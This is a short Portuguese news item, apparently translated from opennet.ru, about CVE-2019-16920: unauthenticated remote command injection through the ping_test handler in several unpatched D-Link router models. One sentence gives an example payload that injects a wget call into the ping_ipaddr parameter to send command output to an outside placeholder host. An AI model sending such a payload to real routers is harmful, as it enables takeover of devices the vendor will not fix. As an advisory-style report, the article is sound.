Vulnerabilidade explorável remotamente em roteadores D-Link

Em roteadores sem fio D-Link identificado vulnerabilidade perigosa (CVE-2019–16920), que permite executar código remotamente no lado do dispositivo, enviando uma solicitação especial ao manipulador “ping_test”, acessível sem autenticação.

Curiosamente, segundo os desenvolvedores do firmware, a chamada “ping_test” deve ser executada somente após a autenticação, mas na realidade ela é chamada em qualquer caso, independente do login na interface web. Em particular, ao acessar o script apply_sec.cgi e passar o parâmetro “action=ping_test”, o script redireciona para a página de autenticação, mas ao mesmo tempo executa a ação associada ao ping_test. Para executar o código, outra vulnerabilidade foi utilizada no próprio ping_test, que chama o utilitário ping sem verificar adequadamente a exatidão do endereço IP enviado para teste. Por exemplo, para chamar o utilitário wget e transferir os resultados do comando “echo 1234” para um host externo, basta especificar o parâmetro “ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// teste.teste/?$(eco 1234)".

Vulnerabilidade explorável remotamente em roteadores D-Link

A presença da vulnerabilidade foi oficialmente confirmada nos seguintes modelos:

  • DIR-655 com firmware 3.02b05 ou anterior;
  • DIR-866L com firmware 1.03b04 ou anterior;
  • DIR-1565 com firmware 1.01 ou anterior;
  • DIR-652 (nenhuma informação sobre versões de firmware problemáticas é fornecida)

O período de suporte para estes modelos já expirou, então a D-Link dito, que não lançará atualizações para eliminar a vulnerabilidade, não recomenda seu uso e aconselha substituí-los por novos dispositivos. Como solução alternativa de segurança, você pode limitar o acesso à interface da Web apenas a endereços IP confiáveis.

Mais tarde foi descoberto que a vulnerabilidade também estava afeta modelos DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 e DIR-825, cujos planos de lançamento de atualizações ainda não são conhecidos.

Fonte: opennet.ru

Adicionar um comentário